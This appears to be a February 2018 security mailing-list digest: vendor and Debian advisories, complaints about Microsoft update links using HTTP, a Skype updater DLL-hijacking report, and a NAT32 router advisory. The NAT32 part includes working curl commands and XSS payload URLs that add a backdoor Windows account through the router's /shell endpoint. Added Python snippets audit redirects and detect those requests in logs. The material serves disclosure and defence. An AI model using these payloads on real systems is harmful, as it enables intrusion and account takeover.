Defense in depth -- the Microsoft way (part 52): HTTP used to distribute (security) updates, not HTTPS

2018-02-14 Thread Stefan Kanthak
Hi @ll,

yesterday's "Security update deployment information: February 13, 2018"
 links the following
MSKB articles for the security updates of Microsoft's Office products:














Alternatively use yesterday's "February 2018 updates for Microsoft Office"
 and all the MSKB
articles linked there, which are a superset of those named above.

Each of these MSKB articles in turn contains one or two links to the
download pages for the updates, which except 2 (of 22) are of the form

(despite the HTTPS: used for the MSKB articles), i.e. they use HTTP
instead of HTTPS, inviting MitM attacks, ALTHOUGH the server
www.microsoft.com supports HTTPS and even redirects these requests to
!

JFTR: this bad habit is of course present in ALMOST ALL MSKB articles
  for previous security updates for Microsoft's Office products
  too ... and Microsoft does NOT CARE A B^HSHIT about it!


Microsoft also links all the MSKB articles for their Windows security
updates, for example , in
their "Security update deployment information:  , ".

Almost all of these MSKB articles as well as those for Microsoft's Office
products (see above) in turn contain a link to Microsoft's "Update Catalog",
which ALL are of the form

(despite the HTTPS: used for the MSKB articles), i.e. they use HTTP
instead of HTTPS, inviting MitM attacks, ALTHOUGH the server
catalog.update.microsoft.com [*] supports HTTPS!

JFTR: even if you browse the "Microsoft Update Catalog" via
   [#],
  ALL download links published there use HTTP, not HTTPS!

That's trustworthy computing ... the Microsoft way!


Despite numerous mails sent to  in the last years,
and numerous replies "we'll forward this to the product groups", nothing
happens at all.


stay tuned
Stefan Kanthak


[*] catalog.update.microsoft.com is redirected to
catalog.update.microsoft.com/v7/site, which in turn is redirected to
www.catalog.update.microsoft.com/, for both HTTP and HTTPS

CONNECT https://catalog.update.microsoft.com
GET / http/1.1

| HTTP/1.1 302 Found
| Cache-Control: private
| Content-Length: 125
| Content-Type: text/html; charset=utf-8
| Location: /v7/site
| Server: Microsoft-IIS/10.0
| X-AspNet-Version: 4.0.30319
| X-Powered-By: ASP.NET
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 301 Moved Permanently
| Content-Length: 168
| Content-Type: text/html; charset=UTF-8
| Location: https://catalog.update.microsoft.com/v7/site/
| Server: Microsoft-IIS/10.0
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 302 Redirect
| Content-Length: 164
| Content-Type: text/html; charset=UTF-8
| Location: https://www.catalog.update.microsoft.com/
| Server: Microsoft-IIS/10.0
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 200 OK
| Cache-Control: private
| Content-Length: 11135
| Content-Type: text/html; charset=utf-8
| Server: Microsoft-IIS/10.0
| X-AspNet-Version: 4.0.30319
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Date: Wed, 14 Feb 2018 09:42:53 GMT

[#] if your browser attempts to connect to these servers with HTTP/2,
it fails: they use a blacklisted cipher suite with HTTP/2, see

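As an added example (not part of Stefan Kanthak's post), a small Python audit of a redirect chain like the one quoted above: it parses raw response heads, resolves each Location against the current URL, flags every hop that would be fetched over plaintext HTTP, and reads the Strict-Transport-Security header of the final response. The responses are constructed from the header blocks quoted in the post; nothing is fetched from the network.

```python
"""Audit a redirect chain for plaintext hops and HSTS.

Added example, not from the post: the responses below are constructed from
the header blocks quoted in the post, so nothing is fetched from the network.
"""
from urllib.parse import urljoin, urlsplit

# Constructed sample: the four hops quoted in the post, as raw response heads.
SAMPLE_CHAIN = [
    "HTTP/1.1 302 Found\r\nLocation: /v7/site\r\nServer: Microsoft-IIS/10.0\r\n\r\n",
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: https://catalog.update.microsoft.com/v7/site/\r\n\r\n",
    "HTTP/1.1 302 Redirect\r\n"
    "Location: https://www.catalog.update.microsoft.com/\r\n\r\n",
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n\r\n",
]

REDIRECTS = (301, 302, 303, 307, 308)


def parse_response(raw):
    """Return (status_code, {header-name-lower: value}) from a raw response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def parse_hsts(value):
    """Split a Strict-Transport-Security value into its directives."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            key, val = part.split("=", 1)
            directives[key.strip().lower()] = val.strip()
        else:
            directives[part.lower()] = True
    return directives


def audit_chain(start_url, responses):
    """Walk the chain from start_url, recording each hop's URL, the hops that
    travel over plaintext HTTP, and the HSTS policy of the final response.
    A relative Location (like '/v7/site') keeps the scheme of the current hop,
    which is why an http:// start stays plaintext until an absolute https://
    Location is seen."""
    url = start_url
    hops = [url]
    plaintext_hops = []
    hsts = None
    for raw in responses:
        status, headers = parse_response(raw)
        if urlsplit(url).scheme != "https":
            plaintext_hops.append(url)
        if status in REDIRECTS and "location" in headers:
            url = urljoin(url, headers["location"])
            hops.append(url)
            continue
        if "strict-transport-security" in headers:
            hsts = parse_hsts(headers["strict-transport-security"])
        break
    return {"final_url": url, "hops": hops,
            "plaintext_hops": plaintext_hops, "hsts": hsts}
```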



[security bulletin] MFSBGN03800 rev.1 - Micro Focus Performance Center, Remote Arbitrary Code Execution or Remote Arbitrary File Modification

2018-02-14 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03091103

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03091103
Version: 1

MFSBGN03800 rev.1 - Micro Focus Performance Center, Remote Arbitrary Code
Execution or Remote Arbitrary File Modification

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-02-13
Last Updated: 2018-02-13

Potential Security Impact: Remote: Arbitrary Code Execution, Arbitrary File
Modification

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Performance
Center. The vulnerability could be exploited to Remote Arbitrary File
Modification or Remote Arbitrary Code Execution.

References:

  - CVE-2017-11357

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Performance Center -v 12.55 and older

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus
Performance Center:

* The fix is applied to PC versions 12.53 and 12.55. More details can be
found here:


* If you are using older versions of the software please upgrade them to
appropriate versions before getting the fix.

HISTORY
Version: 1 (rev.1) - 13 February 2018 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Micro Focus products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin
alerts via Email, please subscribe here:
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under
product and document types.
 Please note that you will need to sign in using a Passport account. If you do
not have a Passport account yet, you can create one; it's free and easy:
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to
maintain system integrity. Micro Focus is continually reviewing and enhancing
the security features of software products to provide customers with current
secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring
to the attention of users of the affected Micro Focus products the important
security information contained in this Bulletin. Micro Focus recommends that
all users determine the applicability of this information to their individual
situations and take appropriate action. Micro Focus does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, Micro Focus will not be responsible for any damages resulting
from user's use or disregard of the information provided in this Security
Bulletin. To the extent permitted by law, Micro Focus disclaims all warranties,
either express or implied, including the warranties of merchantability and
fitness for a particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions
contained herein. The information provided is provided "as is" without warranty
of any kind. To the extent permitted by law, neither Micro Focus nor its
affiliates, subcontractors or suppliers will be liable for incidental, special
or consequential damages including downtime cost; lost profits; damages
relating to the procurement of substitute products or services; or damages for
loss of data, or software restoration.
The information in this document is

[SECURITY] [DSA 4114-1] jackson-databind security update

2018-02-14 Thread Sebastien Delafond
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4114-1   secur...@debian.org
https://www.debian.org/security/   Sebastien Delafond
February 15, 2018 https://www.debian.org/security/faq
- -

Package: jackson-databind
CVE ID : CVE-2017-17485 CVE-2018-5968
Debian Bug : 888316 888318

It was discovered that jackson-databind, a Java library used to parse
JSON and other data formats, did not properly validate user input
before attempting deserialization. This allowed an attacker to perform
code execution by providing maliciously crafted input.

For the oldstable distribution (jessie), these problems have been fixed
in version 2.4.2-2+deb8u3.

For the stable distribution (stretch), these problems have been fixed in
version 2.8.6-1+deb9u3.

We recommend that you upgrade your jackson-databind packages.

For the detailed security status of jackson-databind please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/jackson-databind

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 4113-1] libvorbis security update

2018-02-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4113-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
February 14, 2018 https://www.debian.org/security/faq
- -

Package: libvorbis
CVE ID : CVE-2017-14632 CVE-2017-14633

Two vulnerabilities were discovered in the libraries of the Vorbis audio
compression codec, which could result in denial of service or the
execution of arbitrary code if a malformed media file is processed.

For the stable distribution (stretch), these problems have been fixed in
version 1.3.5-4+deb9u1.

We recommend that you upgrade your libvorbis packages.

For the detailed security status of libvorbis please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libvorbis

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



NAT32 Build (22284) Remote Code Execution CVE-2018-6940 (hyp3rlinx / apparition security)

2018-02-14 Thread apparitionsec
[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt
[+] ISR: Apparition Security

[-_-] D1rty0tis
 

Vendor:
=
www.nat32.com


Product:
=
NAT32 Build (22284)


NAT32 is a versatile IP Router implemented as a WIN32 application.


Vulnerability Type:
===
Remote Command Execution 


CVE Reference:
==
CVE-2018-6940


Security Issue:

NAT32 listens on Port 8080 for its Web interface.

C:\>netstat -ano | findstr 8080
  TCP    0.0.0.0:8080    0.0.0.0:0    LISTENING    3720


If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user 
must select it under config tab) then remote attackers who can reach
NAT32 can potentially execute arbitrary commands, if authentication is enabled 
they will get 'Unauthorized' server reply, however, read on ...

e.g.

Add user account.

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


run start net user D1rty0Tis abc123 /add Done



If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL 
potentially issue arbitrary commands exploiting a
Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated 
NAT32 users click a malicious link
or visit an attacker controlled webpage. 

Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 
Encoded credentials which can be easily
revealed if sniffed on network.

When 'Password Checking' is enabled attackers using Ajax calls via XSS would 
need to use a combination of '%0D%0A' and double encoding
to deal with 'white-space' in order for the payload to stay intact.

%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, 
however '%0D%0A' (CRLF) and '%2520' encoding serves us well.

NAT32 has an interesting Command 'EXECR' that can allow attackers to capture 
Command output response from the server to see right away if an
attack was success or not.

e.g.

Add account and get response (EXECR)

HTTP Response:


The command completed successfully.

execr net user D1rty0Tis abc123 /add Done



The NAT32 'winroute' Command will return host route information.

XSS response

e.g.



Destination      Mask             Nexthop        Metric  IfIndex  Type  Proto  Age [min:sec]
0.0.0.0          0.0.0.0          192.168.1.2    10      b        4     3      21:41
127.0.0.0        255.0.0.0        127.0.0.1      306     1        3     3      22:04
127.0.0.1        255.255.255.255  127.0.0.1      306     1        3     3      22:04
127.255.255.255  255.255.255.255  127.0.0.1      306     1        3     3      22:04



Exploit/POC:
=
NET32 Password Checking not enabled...

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


NAT32 BASIC authentication enabled use XSS...

Add backdoor account and capture CMD output using NAT32 'execr' shell command.
http://x.x.x.x:8080/shell?cmd=var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);

Get Windows Routes (info disclosure):
http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E



Network Access:
===
Remote


Severity:
=
High


Disclosure Timeline:
=
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : 
February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily 
unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
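As an added example (not part of the advisory), a Python detection routine for web-proxy or IDS access logs: it picks out requests to NAT32's /shell endpoint, undoes the double percent-encoding and CRLF whitespace substitution the advisory describes so that the real command becomes visible, and labels each request for triage. The log lines are constructed in Common Log Format with RFC 5737 documentation addresses in place of x.x.x.x, and the commands in them are harmless placeholders.

```python
"""Flag NAT32 /shell?cmd= requests in access logs and decode the command.

Added example, not from the advisory. Log lines are constructed (Common Log
Format, RFC 5737 documentation addresses); the endpoint, the run/execr/
winroute commands and the %0D%0A / %2520 encodings come from the advisory.
"""
import re
from urllib.parse import unquote_plus, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [14/Feb/2018:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [14/Feb/2018:10:00:07 +0000] "GET /shell?cmd=run+ipconfig HTTP/1.1" 200 300
198.51.100.9 - - [14/Feb/2018:10:01:13 +0000] "GET /shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.open(%27GET%27,%27/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E HTTP/1.1" 200 40
198.51.100.9 - - [14/Feb/2018:10:01:14 +0000] "GET /shell?cmd=execr%2520winroute HTTP/1.1" 401 0
"""

# CLF: client ident user [time] "method target protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)')


def cmd_param(query):
    """Return the raw (still encoded) value of the cmd= parameter, or None."""
    for pair in query.split("&"):
        if pair.startswith("cmd="):
            return pair[len("cmd="):]
    return None


def decode_fully(value, max_rounds=3):
    """Peel repeated percent-encoding (%2520 -> %20 -> space) and turn the
    CRLF (%0D%0A) used as a whitespace substitute into plain spaces."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)  # '+' -> space, as in the advisory's URLs
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value.replace("\r\n", " ")).strip()


def classify(cmd):
    """Label a decoded command the way an analyst would triage it."""
    lowered = cmd.lower()
    if "<script" in lowered or "xmlhttprequest" in lowered:
        return "xss"                 # script reflected through the HTTPD code
    first = lowered.split(" ", 1)[0]
    if first in ("run", "execr"):
        return "command-execution"   # OS command through the shell endpoint
    if first == "winroute":
        return "info-disclosure"     # host routing table returned to the caller
    return "shell-endpoint"


def scan_log(text):
    """One finding per request to /shell, whatever the status: a 401 still
    records an attempt against a password-protected instance."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group(4))
        if target.path != "/shell":
            continue
        raw = cmd_param(target.query)
        cmd = decode_fully(raw) if raw is not None else ""
        findings.append({"client": m.group(1), "status": int(m.group(6)),
                         "cmd": cmd, "verdict": classify(cmd)})
    return findings
```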


[SECURITY] [DSA 4112-1] xen security update

2018-02-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4112-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
February 14, 2018 https://www.debian.org/security/faq
- -

Package: xen
CVE ID : CVE-2017-17563 CVE-2017-17564 CVE-2017-17565
 CVE-2017-17566

Multiple vulnerabilities have been discovered in the Xen hypervisor:

CVE-2017-17563

Jan Beulich discovered that an incorrect reference count overflow
check in x86 shadow mode may result in denial of service or
privilege escalation.

CVE-2017-17564

Jan Beulich discovered that improper x86 shadow mode reference count
error handling may result in denial of service or privilege
escalation.

CVE-2017-17565

Jan Beulich discovered that an incomplete bug check in x86 log-dirty
handling may result in denial of service.

CVE-2017-17566

Jan Beulich discovered that x86 PV guests may gain access to
internally used pages which could result in denial of service or
potential privilege escalation.

In addition this update ships the "Comet" shim to address the Meltdown
class of vulnerabilities for guests with legacy PV kernels. In addition,
the package provides the "Xen PTI stage 1" mitigation which is built-in
and enabled by default on Intel systems, but can be disabled with
`xpti=false' on the hypervisor command line (It does not make sense to
use both xpti and the Comet shim.)

Please refer to the following URL for more details on how to configure
individual mitigation strategies:
https://xenbits.xen.org/xsa/advisory-254.html

Additional information can also be found in README.pti and README.comet.

For the stable distribution (stretch), these problems have been fixed in
version 4.8.3+comet2+shim4.10.0+comet3-1+deb9u4.1.

We recommend that you upgrade your xen packages.

For the detailed security status of xen please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xen

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Re: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

2018-02-14 Thread Jeffrey Walton
On Fri, Feb 9, 2018 at 1:01 PM, Stefan Kanthak  wrote:
> Hi @ll,
>
> since about two or three years now, Microsoft offers Skype as
> optional update on Windows/Microsoft Update.
>
> JFTR: for Microsoft's euphemistic use of "update" see
>   
>
> Once installed, Skype uses its own proprietary update mechanism
> instead of Windows/Microsoft Update: Skype periodically runs
> "%ProgramFiles%\Skype\Updater\Updater.exe"
> under the SYSTEM account.
> When an update is available, Updater.exe copies/extracts another
> executable as "%SystemRoot%\Temp\SKY.tmp" and executes it
> using the command line
> "%SystemRoot%\Temp\SKY.tmp" /QUIET
>
> This executable is vulnerable to DLL hijacking: it loads at least
> UXTheme.dll from its application directory %SystemRoot%\Temp\
> instead from Windows' system directory.
>
> An unprivileged (local) user who is able to place UXTheme.dll or
> any of the other DLLs loaded by the vulnerable executable in
> %SystemRoot%\Temp\ gains escalation of privilege to the SYSTEM
> account.
>
>
> The attack vector is well-known and well-documented as CAPEC-471:
> 
>
> Microsoft published plenty advice/guidance to avoid this beginner's
> error: ,
> ,
> 
> and
> 
> ... which their own developers and their QA but seem to ignore!
>
> See 
> for the same vulnerability in another Microsoft product!

Not sure if this is related, but:
https://winbuzzer.com/2018/02/14/microsoft-just-killed-skype-classic-response-unfixable-security-bug-xcxwbn/

Microsoft today squashed a bug that was found in Skype’s updater
process earlier this week. However, it seems the company’s method for
stopping the flaw is to kill off the Skype classic experience. If that
is the case, users of Skype on Windows 7 and Windows 8.1 could lose
access to the service.

As reported on Monday, a security vulnerability could give hackers
access to system-level privileges. If properly exploited, attackers
could use Skype as a backdoor to get full system rights and enter all
areas of an operating system.

In response, Microsoft said it was unable to fix the bug immediately
because it would require a lot of work. Indeed, the company said patch
the flaw would take a massive code rewrite. In other words, Microsoft
would need to overhaul the whole underpinning of the classic Skype
program.

It seems Microsoft found an alternative to rewriting code and fixing
Skype… the company has decided to effectively kill off the classic
app. The older version of Skype is no longer available anywhere as a
download.
...